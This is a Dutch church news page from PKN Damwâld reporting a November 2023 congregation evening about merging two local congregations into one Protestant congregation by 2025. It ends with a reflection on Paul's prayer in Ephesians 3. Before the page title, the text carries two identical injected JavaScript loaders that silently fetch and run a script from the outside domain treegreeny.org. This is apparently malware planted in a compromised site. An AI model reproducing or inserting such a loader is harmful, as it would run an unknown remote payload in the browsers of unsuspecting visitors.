;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gezamenlijke gemeenteavond .... op weg naar de Protestantse Gemeente Damwâld en omstreken! - PKN Damwâld

Gezamenlijke gemeenteavond …. op weg naar de Protestantse Gemeente Damwâld en omstreken!

Gepubliceerd op: donderdag 9 november

Gereformeerd Damwâld en Hervormd Akkerwoude zijn samen onderweg naar één kerkelijke gemeente. Deo volente is het per 1 januari 2025 zo ver. Hoog tijd voor een gezamenlijke gemeenteavond, zo vonden de beide kerkenraden.

Als beide gemeentes, als beide kerkenraden, als jong en oud zijn we samen onderweg. Op weg naar een fusie, een samensmelting … Gaandeweg Hem tegemoet!

Maar hoe willen wij eigentijds en in deze samenleving kerk zijn/ gemeente zijn? Hoe willen we een beweging op gang brengen in de gemeente waarbij mensen actief invulling geven en eraan bijdragen? Hoe willen we na 1-1-2025 in een nieuwe Protestantse Gemeente Damwâld en omstreken iedereen een plek geven waar men zich thuis voelt? Waar gaan we ons op richten met de mensen en middelen die we hebben? Welke keuzes kunnen of moeten we maken? Hoe verhouden we ons tot de Damwâldster gemeenschap of nog verder weg? Hoe gaan we een richtinggevend antwoord vinden op alle maatschappelijk ontwikkelingen?

In grote getale werd op 8 november 2023 gehoor gegeven aan de oproep om onder anderen te komen praten over de voortgang van het fusieproces, de invulling van de predikantsvacature en hoe de gemeente de toekomst ziet. De gemeenteavond bleek dan ook een prachtige aanzet te zijn tot een vruchtbaar gesprek over onze verbondenheid en onze gemeenschappelijke roeping als Protestantse Gemeente Damwâld en omstreken. Ook bij deze sfeervolle gemeenteavond bleek maar al te meer dat ook formeel gezien het hoog tijd is om elkaar de hand te reiken en samen te gaan zoeken hoe we (lokaal gestalte) kunnen geven aan onze gezamenlijke roeping.

Ondertussen blijft het gebed van Paulus uit Efeze 3 klinken. Een gebed ter bemoediging van onze gemeente en een gebed om verdieping van ons geloof. Dat we een gemeente zijn waar Christus in onze harten woont en dat we een gemeente zijn die geworteld en gefundeerd is in de liefde. Dan kan het niet anders dan dat de toekomst gloort!